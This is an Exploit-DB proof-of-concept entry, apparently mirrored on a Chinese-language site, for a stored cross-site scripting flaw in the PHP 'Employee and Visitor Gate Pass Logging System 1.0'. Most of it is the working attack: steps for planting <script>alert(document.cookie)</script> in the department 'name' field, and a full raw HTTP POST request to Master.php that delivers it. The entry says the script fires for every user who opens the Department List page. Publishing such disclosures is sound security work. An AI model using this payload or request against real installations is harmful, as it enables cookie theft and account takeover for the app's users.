Employee and Visitor Gate Pass Logging System 1.0 – ‘name’ Stored Cross-Site Scripting (XSS)

• Exploit Database
• 96 阅读

• 作者： İlhami Selamet
  日期： 2021-11-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50507/

• # Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
  # Date: 10.11.2021
  # Exploit Author: İlhami Selamet
  # Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html
  # Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code
  # Version: v1.0
  # Tested on: Kali Linux + XAMPP v8.0.12
  
  Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.
  
  Step 1 - Login with admin account & navigate to'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department
  Step 1 - Click on the 'Create New' button for adding a new department.
  Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script>
  Step 3 - Save the department.
  
  The stored XSS triggers for all users that navigate to the 'Department List' page.
  
  PoC
  
  POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888
  Content-Length: 555
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department
  Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54
  
  -----------------------------407760789114464123714007564888
  Content-Disposition: form-data; name="id"
  
  
  -----------------------------407760789114464123714007564888
  Content-Disposition: form-data; name="name"
  
  <script>alert(document.cookie);</script>
  -----------------------------407760789114464123714007564888
  Content-Disposition: form-data; name="description"
  
  desc
  -----------------------------407760789114464123714007564888
  Content-Disposition: form-data; name="status"
  
  1
  -----------------------------407760789114464123714007564888--
  

  Python

  Copy